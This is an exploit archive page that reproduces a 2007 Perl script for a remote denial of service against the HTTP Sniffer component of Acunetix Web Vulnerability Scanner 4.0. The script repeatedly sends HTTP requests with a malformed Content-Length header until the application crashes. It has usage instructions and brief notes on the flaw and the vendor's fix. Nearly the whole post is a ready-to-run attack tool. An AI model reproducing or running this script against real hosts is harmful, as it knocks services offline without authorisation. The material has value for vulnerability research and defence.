首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Acunetix WVS <= 4.0 20060717 HTTP Sniffer Component Remote DoS
来源:vfocus.net 作者:nitr0us 发布时间:2007-01-05  

#!/usr/bin/perl -w
#
# Acunetix Web Vulnerability Scanner 4.0 <= Build 20060717
# HTTP Sniffer component
# Remote Denial of Service
#
# Explaination:
# I found a DoS in Acunetix WVS doing a little bit of fuzzing.
# The flaw is triggered when a malformed packet is sent. Thus, an Exception Handler shows
# an Error Window saying: "'die!!!' is not a valid integer value", but, if we sent the
# same packet again (while that message still visible) the application will crash.
#
# The malformed HTTP packet contains an invalid 'Content-Length' field (string), and it
# must be a positive integer.
#
# Acunetix' support: "The bug which was causing it to crash was also related to another
# bug fix which was implemented in later versions.". So, in latest version, an Error
# message like this appears:
# ________________________________________________________
# |wvs.exe |
# |--------------------------------------------------------|
# |[X] An error ocurred in the application |
# | |continue application||
# | |restart application ||
# ||send bug report||show bug report||close applicacion ||
# |________________________________________________________|
#
# Affected version tested:
# Acunetix WVS (Consultant Edition) 4.0 Build 20060717
#
# Non-affected version tested:
# Acunetix WVS 4.0 Build 20060717
#
# nitr0us <nitrousenador[ at ]gmail[ dot]com>
# 01/01/07 . . . Happy new year.

use strict;
use Socket qw( :DEFAULT :crlf ); # $CRLF
use IO::Socket;

sub header
{
print "################################################################\n";
print "# Acunetix Web Vulnerability Scanner 4.0 <= Build 20060717 #\n";
print "# HTTP Sniffer component #\n";
print "# Remote Denial of Service #\n";
print "# by nitr0us #\n";
print "################################################################\n\n";
print "Usage: $0 <host> [port(default 8080)]\n";
exit(0xdead);
}

header() unless $ARGV[0];

my $port = 8080;
my $acunetix_wvs;
my $packetz = 5;

if($ARGV[1]){
$port = $ARGV[1];
}

print "\n[+] Connecting and sending $packetz malformed packetz\n\n";

for(my $foo = 0; $foo < $packetz; $foo++){
$acunetix_wvs = IO::Socket::INET->new( PeerAddr => $ARGV[0],
PeerPort => $port,
Proto => 'tcp')
or die "Could not create socket: $!\n";

print $acunetix_wvs "GET / HTTP/1.0$CRLF";
print $acunetix_wvs "Content-Length: die!!!$CRLF$CRLF"; # Trigger

$acunetix_wvs->close();

sleep(1);
}

print "[+] $packetz malformed packetz sent ];D\n\n";
print "[+] Acunetix WVS! killed ! ;)\n\n";



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Simple Web Content Management
·iLife iPhoto Photocast (XML ti
·VerliAdmin <= 0.3 (language
·CA BrightStor ARCserve (tapeen
·Apple Quicktime (rtsp URL Hand
·Mac OS X 10.4.8 DiskManagement
·Microsoft Vista (NtRaiseHardEr
·Mac OS X 10.4.8 DiskManagement
·L2J Statistik Script <= 0.0
·NaviCOPA Web Server 2.01 (GET)
·Wordpress 2.0.5 Trackback UTF-
·AllMyLinks <= 0.5.0 (index.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved